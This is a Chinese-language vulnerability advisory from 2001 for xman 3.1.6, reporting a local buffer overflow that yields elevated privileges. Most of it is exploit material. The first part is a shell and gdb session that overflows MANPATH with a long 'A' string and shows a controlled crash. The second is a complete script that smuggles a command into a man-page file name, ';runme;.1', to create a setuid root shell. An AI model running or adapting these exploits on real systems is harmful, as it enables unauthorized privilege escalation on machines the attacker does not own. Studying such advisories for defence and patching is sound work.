xman 缓冲区溢出漏洞

/ns/ld/softld/data/20010729072145.htm

xman 缓冲区溢出漏洞

涉及程序:
xman

描述:
本地攻击者利用 xman 缓冲区溢出漏洞取得系统特权

详细:
发现 xman 存在缓冲区溢出漏洞,本地者利用此漏洞可能取得系统特权。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


exploit 1:
[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998
/usr/X11R6/bin/xman*


[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.


[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault


[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141


(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66


-KF

exploit 2:

-- xxman.sh --


#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest


-- xxman.sh --

受影响系统:
xman 3.1.6

解决方案:
尚无

发布时间:2001年7月23日
来源:cnns